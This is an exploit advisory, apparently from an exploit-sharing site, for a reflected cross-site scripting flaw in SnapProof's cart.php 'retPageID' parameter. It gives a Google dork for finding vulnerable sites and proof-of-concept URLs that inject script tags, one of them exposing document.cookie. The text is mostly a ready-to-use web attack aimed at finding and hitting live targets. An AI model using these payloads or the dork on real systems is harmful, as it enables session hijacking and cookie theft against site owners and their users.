SnapProof suffers from a cross site scripting vulnerability.
9b1acd377801d4b56f4d748b041cedee8f151c98173521f4319ea8623654ee86
##########################################################
# Exploit Title: SnapProof (cart.php) Cross Site Scripting
# Google Dork: inurl:"Created and powered by SnapProof"
# home : www.D99Y.com
# Date: 1/3/2011
# Author: Difficult 511
# Software Link: http://www.snapproof.com/
##########################################################
#
# file :
#
# cart.php
#
# exploit :
#
# http://localhost/cart.php?retPageID= [ XSS ]
#
# http://localhost/cart.php?retPageID=<script>alert(12345)</script>
#
# http://localhost/cart.php?retPageID=<script>alert(document.cookie)</script>
#
##########################################################
Greetz :
NassRawI and all members D99Y.com
Enjoy :)